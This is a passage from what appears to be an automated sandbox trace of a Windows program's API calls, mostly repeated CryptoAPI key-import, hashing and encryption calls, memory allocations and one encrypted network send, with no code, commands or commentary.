dwBufLen=0x80 | out: pbData=0x60a248*, pdwDataLen=0x339f960*=0x80) returned 1 [0144.059] CryptDestroyKey (hKey=0x432978) returned 1 [0144.059] CryptImportKey (in: hProv=0x3cf450, pbData=0x339fa30, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x339fa2c | out: phKey=0x339fa2c*=0x432978) returned 1 [0144.059] CryptSetKeyParam (hKey=0x432978, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0144.059] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f940*, pdwDataLen=0x339f8a4*=0x10, dwBufLen=0x10 | out: pbData=0x339f940*, pdwDataLen=0x339f8a4*=0x10) returned 1 [0144.059] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f940*, pdwDataLen=0x339f8a4*=0x10, dwBufLen=0x10 | out: pbData=0x339f940*, pdwDataLen=0x339f8a4*=0x10) returned 1 [0144.060] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f940*, pdwDataLen=0x339f8a4*=0x10, dwBufLen=0x10 | out: pbData=0x339f940*, pdwDataLen=0x339f8a4*=0x10) returned 1 [0144.060] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f940*, pdwDataLen=0x339f8a4*=0x10, dwBufLen=0x10 | out: pbData=0x339f940*, pdwDataLen=0x339f8a4*=0x10) returned 1 [0144.060] CryptDestroyKey (hKey=0x432978) returned 1 [0144.060] CryptHashData (hHash=0x432d78, pbData=0x36915b0, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0144.060] CryptDuplicateHash (in: hHash=0x432d78, pdwReserved=0x0, dwFlags=0x0, phHash=0x339fa8c | out: phHash=0x339fa8c) returned 1 [0144.060] CryptGetHashParam (in: hHash=0x432eb8, dwParam=0x2, pbData=0x3f65460, pdwDataLen=0x339fa24, dwFlags=0x0 | out: pbData=0x3f65460, pdwDataLen=0x339fa24) returned 1 [0144.060] CryptDestroyHash (hHash=0x432eb8) returned 1 [0144.060] free (_Block=0x3f65460) [0144.060] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10) returned 1 [0144.060] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10) returned 1 [0144.060] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10) returned 1 [0144.060] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10) returned 1 [0144.060] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10) returned 1 [0144.061] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10) returned 1 [0144.061] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10) returned 1 [0144.061] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10) returned 1 [0144.061] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10) returned 1 [0144.061] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10) returned 1 [0144.061] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10) returned 1 [0144.061] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10) returned 1 [0144.061] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10) returned 1 [0144.061] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10) returned 1 [0144.061] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10) returned 1 [0144.061] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10) returned 1 [0144.061] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10) returned 1 [0144.062] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10) returned 1 [0144.062] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10) returned 1 [0144.062] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10) returned 1 [0144.062] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10) returned 1 [0144.062] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10) returned 1 [0144.062] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10) returned 1 [0144.062] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10) returned 1 [0144.062] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10) returned 1 [0144.062] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10) returned 1 [0144.062] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10) returned 1 [0144.062] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10) returned 1 [0144.062] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10) returned 1 [0144.062] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10) returned 1 [0144.062] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10) returned 1 [0144.062] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10, dwBufLen=0x10 | out: pbData=0x3594d5c*, pdwDataLen=0x339f9dc*=0x10) returned 1 [0144.062] EncryptMessage (in: phContext=0x3d81944, fQOP=0x0, pMessage=0x339fa14, MessageSeqNo=0x0 | out: pMessage=0x339fa14) returned 0x0 [0144.063] send (s=0x5b0, buf=0x3689268*, len=543, flags=0) returned 543 [0144.064] free (_Block=0x36915b0) [0144.064] free (_Block=0x3d81f68) [0144.064] free (_Block=0x3def218) [0144.064] free (_Block=0x605a18) [0144.064] free (_Block=0x3d81e60) [0144.064] GetTickCount () returned 0x1164e95 [0144.064] malloc (_Size=0x10) returned 0x3648cc8 [0144.064] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648cc8*=0x5c8, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0144.064] free (_Block=0x3648cc8) [0144.064] GetTickCount () returned 0x1164e95 [0144.064] malloc (_Size=0x10) returned 0x3648e48 [0144.064] WaitForMultipleObjects (nCount=0x2, lpHandles=0x3648e48*=0x5c8, bWaitAll=0, dwMilliseconds=0x7530) returned 0x0 [0144.425] free (_Block=0x3648e48) [0144.425] GetTickCount () returned 0x1164ffc [0144.426] SetEvent (hEvent=0x5c8) returned 1 [0144.426] SetEvent (hEvent=0x3a4) returned 1 [0144.426] CryptCreateHash (in: hProv=0x3cf450, Algid=0x8004, hKey=0x0, dwFlags=0x0, phHash=0x339fabc | out: phHash=0x339fabc) returned 1 [0144.426] CryptHashData (hHash=0x432978, pbData=0x3594e80, dwDataLen=0x8c, dwFlags=0x0) returned 1 [0144.426] malloc (_Size=0x14) returned 0x3f652c0 [0144.426] free (_Block=0x0) [0144.426] CryptGetHashParam (in: hHash=0x432978, dwParam=0x2, pbData=0x3f652c0, pdwDataLen=0x339fab4, dwFlags=0x0 | out: pbData=0x3f652c0, pdwDataLen=0x339fab4) returned 1 [0144.426] CryptDestroyHash (hHash=0x432978) returned 1 [0144.426] malloc (_Size=0x13d) returned 0x3dd48d8 [0144.426] free (_Block=0x0) [0144.426] malloc (_Size=0x34) returned 0x36243b0 [0144.426] malloc (_Size=0x338) returned 0x36915b0 [0144.426] malloc (_Size=0x80) returned 0x60a248 [0144.426] free (_Block=0x0) [0144.426] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x80, pbBuffer=0x60a248 | out: pbBuffer=0x60a248) returned 1 [0144.426] CryptImportKey (in: hProv=0x3e57b0, pbData=0x339f750, dwDataLen=0x190, hPubKey=0x0, dwFlags=0x1, phKey=0x339f74c | out: phKey=0x339f74c*=0x4327f8) returned 1 [0144.430] CryptExportKey (in: hKey=0x4327f8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x339f3ac, pdwDataLen=0x339f394 | out: pbData=0x339f3ac*, pdwDataLen=0x339f394*=0x90) returned 1 [0144.430] free (_Block=0x60a248) [0144.430] malloc (_Size=0x10) returned 0x3648c80 [0144.430] free (_Block=0x0) [0144.430] CryptGenRandom (in: hProv=0x3cf450, dwLen=0x10, pbBuffer=0x3648c80 | out: pbBuffer=0x3648c80) returned 1 [0144.430] malloc (_Size=0x40) returned 0x3e227d0 [0144.430] free (_Block=0x0) [0144.430] malloc (_Size=0x104) returned 0x3df04b8 [0144.430] free (_Block=0x3e227d0) [0144.430] CryptDecodeObject (in: dwCertEncodingType=0x1, lpszStructType=0x13, pbEncoded=0x3594e80, cbEncoded=0x8c, dwFlags=0x0, pvStructInfo=0x339f984, pcbStructInfo=0x339f95c | out: pvStructInfo=0x339f984, pcbStructInfo=0x339f95c) returned 1 [0144.430] CryptImportKey (in: hProv=0x3cf450, pbData=0x339f984, dwDataLen=0x94, hPubKey=0x0, dwFlags=0x1, phKey=0x339f980 | out: phKey=0x339f980*=0x432978) returned 1 [0144.430] malloc (_Size=0x80) returned 0x6099c8 [0144.430] free (_Block=0x0) [0144.430] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=1, dwFlags=0x40, pbData=0x6099c8*, pdwDataLen=0x339f950*=0x56, dwBufLen=0x80 | out: pbData=0x6099c8*, pdwDataLen=0x339f950*=0x80) returned 1 [0144.431] CryptDestroyKey (hKey=0x432978) returned 1 [0144.431] CryptImportKey (in: hProv=0x3cf450, pbData=0x339fa20, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x339fa1c | out: phKey=0x339fa1c*=0x432978) returned 1 [0144.431] CryptSetKeyParam (hKey=0x432978, dwParam=0x4, pbData=0x74199484*=0x2, dwFlags=0x0) returned 1 [0144.431] malloc (_Size=0xf7) returned 0x3d81e60 [0144.431] free (_Block=0x0) [0144.431] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f930*, pdwDataLen=0x339f894*=0x10, dwBufLen=0x10 | out: pbData=0x339f930*, pdwDataLen=0x339f894*=0x10) returned 1 [0144.431] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f930*, pdwDataLen=0x339f894*=0x10, dwBufLen=0x10 | out: pbData=0x339f930*, pdwDataLen=0x339f894*=0x10) returned 1 [0144.431] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f930*, pdwDataLen=0x339f894*=0x10, dwBufLen=0x10 | out: pbData=0x339f930*, pdwDataLen=0x339f894*=0x10) returned 1 [0144.431] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f930*, pdwDataLen=0x339f894*=0x10, dwBufLen=0x10 | out: pbData=0x339f930*, pdwDataLen=0x339f894*=0x10) returned 1 [0144.431] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f930*, pdwDataLen=0x339f894*=0x10, dwBufLen=0x10 | out: pbData=0x339f930*, pdwDataLen=0x339f894*=0x10) returned 1 [0144.431] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f930*, pdwDataLen=0x339f894*=0x10, dwBufLen=0x10 | out: pbData=0x339f930*, pdwDataLen=0x339f894*=0x10) returned 1 [0144.431] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f930*, pdwDataLen=0x339f894*=0x10, dwBufLen=0x10 | out: pbData=0x339f930*, pdwDataLen=0x339f894*=0x10) returned 1 [0144.431] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f930*, pdwDataLen=0x339f894*=0x10, dwBufLen=0x10 | out: pbData=0x339f930*, pdwDataLen=0x339f894*=0x10) returned 1 [0144.431] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f930*, pdwDataLen=0x339f894*=0x10, dwBufLen=0x10 | out: pbData=0x339f930*, pdwDataLen=0x339f894*=0x10) returned 1 [0144.431] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f930*, pdwDataLen=0x339f894*=0x10, dwBufLen=0x10 | out: pbData=0x339f930*, pdwDataLen=0x339f894*=0x10) returned 1 [0144.431] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f930*, pdwDataLen=0x339f894*=0x10, dwBufLen=0x10 | out: pbData=0x339f930*, pdwDataLen=0x339f894*=0x10) returned 1 [0144.432] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f930*, pdwDataLen=0x339f894*=0x10, dwBufLen=0x10 | out: pbData=0x339f930*, pdwDataLen=0x339f894*=0x10) returned 1 [0144.432] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f930*, pdwDataLen=0x339f894*=0x10, dwBufLen=0x10 | out: pbData=0x339f930*, pdwDataLen=0x339f894*=0x10) returned 1 [0144.432] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f930*, pdwDataLen=0x339f894*=0x10, dwBufLen=0x10 | out: pbData=0x339f930*, pdwDataLen=0x339f894*=0x10) returned 1 [0144.432] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f930*, pdwDataLen=0x339f894*=0x10, dwBufLen=0x10 | out: pbData=0x339f930*, pdwDataLen=0x339f894*=0x10) returned 1 [0144.432] CryptEncrypt (in: hKey=0x432978, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x339f930*, pdwDataLen=0x339f894*=0x10, dwBufLen=0x10 | out: pbData=0x339f930*, pdwDataLen=0x339f894*=0x10) returned 1 [0144.432] CryptDestroyKey (hKey=0x432978) returned 1 [0144.432] malloc (_Size=0x100) returned 0x3d81f60 [0144.432] free (_Block=0x0) [0144.432] malloc (_Size=0x404) returned 0x3def010 [0144.432] free (_Block=0x3d81f60) [0144.432] free (_Block=0x0) [0144.432] free (_Block=0x3d81e60) [0144.432] free (_Block=0x6099c8) [0144.432] free (_Block=0x3df04b8) [0144.432] free (_Block=0x3648c80) [0144.432] malloc (_Size=0x40) returned 0x3e22428 [0144.432] free (_Block=0x0) [0144.432] malloc (_Size=0x410) returned 0x3def420 [0144.432] free (_Block=0x3e22428) [0144.433] malloc (_Size=0x18b) returned 0x3f69828 [0144.433] free (_Block=0x0) [0144.433] free (_Block=0x0) [0144.433] malloc (_Size=0x1fd) returned 0x3d81e60 [0144.433] free (_Block=0x0) [0144.433] CryptHashData (hHash=0x432d38, pbData=0x3d81e60, dwDataLen=0x1fd, dwFlags=0x0) returned 1 [0144.433] CryptDuplicateHash (in: hHash=0x432d38, pdwReserved=0x0, dwFlags=0x0, phHash=0x339fa4c | out: phHash=0x339fa4c) returned 1 [0144.433] malloc (_Size=0x14) returned 0x3f65500 [0144.433] free (_Block=0x0) [0144.433] CryptGetHashParam (in: hHash=0x432978, dwParam=0x2, pbData=0x3f65500, pdwDataLen=0x339f9e4, dwFlags=0x0 | out: pbData=0x3f65500, pdwDataLen=0x339f9e4) returned 1 [0144.433] CryptDestroyHash (hHash=0x432978) returned 1 [0144.433] free (_Block=0x3f65500) [0144.433] malloc (_Size=0x1fd) returned 0x3f68010 [0144.433] free (_Block=0x0) [0144.433] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.433] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.433] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.433] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.433] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.433] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.433] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.434] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.434] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.434] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.434] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.434] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.434] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.434] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.434] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.434] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.434] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.434] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.434] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.434] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.434] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.434] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.434] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.434] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.434] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.434] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.435] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.435] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.435] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.435] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.435] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.435] CryptEncrypt (in: hKey=0x432738, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10, dwBufLen=0x10 | out: pbData=0x605a5c*, pdwDataLen=0x339f99c*=0x10) returned 1 [0144.435] malloc (_Size=0x1fd) returned 0x3f68218 [0144.435] free (_Block=0x0) [0144.435] free (_Block=0x0) [0144.435] free (_Block=0x3f68010) [0144.435] free (_Block=0x3d81e60) [0144.435] malloc (_Size=0x1fd) returned 0x3f68010 